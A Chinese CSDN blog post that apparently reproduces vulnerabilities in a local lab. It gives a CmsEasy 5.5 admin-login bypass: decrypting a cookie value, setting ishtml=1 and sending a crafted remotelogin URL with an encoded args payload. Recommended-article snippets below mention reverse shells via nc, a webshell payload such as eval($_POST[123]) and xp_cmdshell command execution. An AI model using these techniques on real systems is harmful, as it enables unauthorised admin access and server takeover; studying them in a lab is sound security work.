复现RCE与SQL

最新推荐文章于 2024-10-16 10:13:45 发布
最新推荐文章于 2024-10-16 10:13:45 发布
阅读量257 收藏 6
点赞数 2
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64525301/article/details/141111385
版权

发现用户和密码存储在cookie中


  $args = xxtea_decrypt(base64_decode(front::$args), config::get('cookie_password'));

进行反向加码解码,即可获得args

只需要ishtml=1 就可以绕过使得条件为真

http://127.0.0.1/CmsEasy_5.5_UTF-8_20140605/uploads/index.php?case=admin&act=login&admin_dir=admin&site=default&ishtml=1

 

将获得的args中+ 和 /分别替换为%2b和%2f

当前的操作或请求类型是针对管理员,要执行的动作是remotelogin,即远程登录,指定了管理员目录的名称

http://127.0.0.1/CmsEasy_5.5_UTF-8_20140605/uploads/index.php?case=admin&act=remotelogin&admin_dir=admin&site=default&args=xUKKUusexld8%2fO2638yd42xG%2b5Vx2Eumj9azpzanmLlGno4T4yiJvEmMB6aYW0FNRw4ZB8mFNr26fWwovnLsEzR9SsIP2MI4hGus8WrJE4hkSPs42xHYej%2bstJH0soK%2f59iAyNud6IarQbGxnJBNa6oiHPKC8p0kzfU8b1s6bPUa1kX2vOeZRtqyrqTaban%2fwHE1ZLhYLzCsSvcHlNgCCnJBIL0=

李Xian.
关注
PbootCMS 前台RCE漏洞复现
0xSec
12-07 3603
PbootCMS v
RCEsql
sgg236的博客
08-11 356
RCE 指的是攻击者能够在远程系统上执行任意代码。这是一种非常严重的安全漏洞,因为它允许攻击者完全控制受影响的系统。造成 RCE 漏洞的原因通常包括以下几点:1. 输入验证不足:服务器端对用户输入的数据没有进行充分的验证和过滤,使得攻击者能够构造恶意的输入来执行任意代码。2. 不安全的函数调用:使用了一些存在安全风险的函数或方法,被攻击者利用来执行代码。3. 权限配置不当:系统权限设置不合理,导致攻击者能够获得执行代码的权限。
值得复现rcesql
gggghcvg的博客
08-12 247
利用cmd命令远程下载文件 (1.txt不需要创建)那么我们可以构造下面语句进行sql注入。使用kali的nc监听3939端口。当我们输入1'和1时候页面没有反应。监听成功,成功get shel。浏览器访问2.php文件。sqllabs 第12关。将2.php文件上传。
SqlRce注入相关漏洞复现
山月不问人间事
08-12 819
‌这些查询可以是SELECT、‌INSERT、‌UPDATE或DELETE等,‌它们将在数据库中按顺序处理,‌尽管它们是在单个函数调用中发送的。假设我发送的是这样一个请求:i_d=1&i.d=2 ,php先将i.d转换成i_d,即为i_d=1&i_d=2 ,再获取到的$_REQUEST['i_d']就是2。可在$_SERVER['REQUEST_URI']中,i_d和i.d却是两个完全不同的参数名,那么切割覆盖后,获取的$_REQUEST['i_d']却是1。参数是可选的,‌用于限制分割后的数组元素数量。
RCESQL漏洞的复现
weixin_65476290的博客
08-17 557
首先,我们还是先把环境搭好(此次的所有漏洞环境我都部署在Ubuntu下,我的Ubuntu下的环境是nginx+php,至于Ubuntu下的nginx+php环境我也有博客也写到,希望可以帮助到到家。在这里,我建议nginx下的html文件夹最好的用户组和用户都设置为www-data,否则之后的创建一句话木马可能不能创建,我的环境在最开始的时候用户组和用户为root,所以我在这吃了点亏,望大家引以为戒。我们既然可以创建这个,那么webshell不也可以吗,只做到这里,剩下的一句话木马的生成可以自行研究下。
Nacos Derby从SQLRCE
好记性不如烂笔头
07-16 2591
derby路径下的函数如下,该方法主要用于Derby数据库的查询操作,确保只执行SELECT语句,并在必要时添加分页限制。如果当前存储模式不是 Derby 或者遇到异常,方法会返回相应的错误信息。在Java应用程序中使用JDBC API调用Derby的存储过程和函数会触发相应的函数执行。
thinkphp5 RCE漏洞复现
feng的博客
03-03 3498
前言 之前看的是tp3的SQL注入,现在开始审计一下tp5的一些SQL注入和RCE。先看一下RCE,毕竟thinkphp最广为人知的漏洞就是RCE。 首先是源码的下载,我从这里下载: thinkphp下载 这里我下载的是thinkphp5.0.22完整版,如果下载核心版的话可能会有一些代码的缺失。 debug模式开启下的RCE 和之前tp5.1的反序列化一样,RCE的执行点也都是重要的request类。关键在于这个filterValue()函数: /** * 递归过滤给定的值 * @param mixe
sqlrce漏洞整理
yfy0308的博客
08-11 914
源代码进行了两次取值,第一次取值判断是否有非法字符,也就是第二个waf,第二次取值会覆盖第一次(在这里会产生问题),然后进行'&', '"', '<', '>', '(', ')'的过滤。传值pass=$_POST[123],按理来说,assert可以执行$_POST,但是用动态传递的方式失败,使用蚁剑连接失败,但是在前面加一个eval即可成功,即pass=eval($_POST[123])i_d=1&i_d=2 php会默认取第二个,两次取值函数都取第二个无害数据,我们的有害数据没进去。
Nacos 202407月RCE漏洞(0day)与复现
分享不一样的技术,与你一起共同成长!
07-31 1865
202407月, 爆出漏洞作者说由于某些原因,特意爆出了Nacos的一个RCE 0day漏洞。Nacos 是一个用于动态服务发现和配置以及服务管理的平台,Derby 是一个轻量级的嵌入式数据库。接口 /nacos/v1/cs/ops/derby 和 /nacos/v1/cs/ops/data/removal 在使用 Derby 数据库作为内置数据源时。用于运维人员进行数据运维和问题排查,在使用 standalone 模式启动 Nacos 时,为了避免因搭建外置数据库而占用额外的资源...
用友NC pagesServlet SQL注入致RCE漏洞复现(XVE-2024-13067)
0xSec
06-03 963
用友NC /portal/pt/servlet/pagesServlet/doPost接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
科讯校园一卡通管理系统 多处SQL注入致RCE漏洞复现
0xSec
07-24 3002
科讯校园一卡通管理系统 get_kq_tj_today、dormitoryHealthRanking、DataService.asmx等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
飞企互联-FE企业运营管理平台 多处 SQL注入致RCE漏洞复现
0xSec
06-28 968
飞企互联-FE企业运营管理平台 checkGroupCode、efficientCodewidget39、ajax_codewidget39等接口存在SQL注入漏洞,未经授权攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
科迅图书馆云平台 WebCloud.asmx SQL注入致RCE漏洞复现
0xSec
05-30 609
科迅图书馆云平台 WebCloud.asmx接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
朗新天霁eHR GetFunc_code.asmx SQL注入致RCE漏洞复现
0xSec
07-04 1623
朗新天霁eHR GetFunc_code.asmx接口的GetMessage、GetShortMessage、GetToken、GetMessageNew等多个实例处存在SQL注入漏洞,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
【C++刷题】力扣-#121-买卖股票的最佳时机
最新发布
会写代码的饭桶
10-16 226
给定一个数组 prices,其中 prices[i] 表示第 i 天的股票价格。假设你可以在第 i 天买入并在第 j 天卖出股票(i ≤ j),设计一个算法来计算你所能获取的最大利润。注意你只能持有一股股票,并且你不能同时参与多笔交易(即在再次买入前必须卖出股票)。
基于SSM班级事务管理系统的设计
2401_87849773的博客
10-15 286
管理员账户功能包括:系统首页,个人中心,学生管理,班委管理,班会组织管理,健康档案管理,党员发展管理,党员培训管理,学生成绩管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。班委账号功能包括:系统首页,学生管理,学生成绩管理,活动信息管理,班费通知管理。服务器:SpringBoot自带 apache tomcat。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发系统:Windows。
2024.10月12日--- SpringMVC异常处理
whisper_Java 的博客
10-12 909
*** 用户【】 IP[]* 在【时间】* 操作【Controller.find】 发生如下异常*/@OverrideSystem.out.println("---------执行了自定义异常处理器------------");// 根据不同的异常类型,设置不同的响应状态码// 可以添加更多的自定义处理逻辑//}else {// 记录日志或其他处理逻辑// 可以将异常信息放入模型中供视图展示。
Backend - Java 基础
是萝卜干呀的博客
10-11 834
知识量决定了未来能走多远
fastjson rce复现
08-09
fastjson是一款流行的Java JSON库,但因其在解析JSON中的不安全行为...需要注意的是,复现fastjson RCE漏洞仅用于研究和教育目的,并且应在法律合规和授权的情况下进行。漏洞利用是非法行为,可能导致严重的法律后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值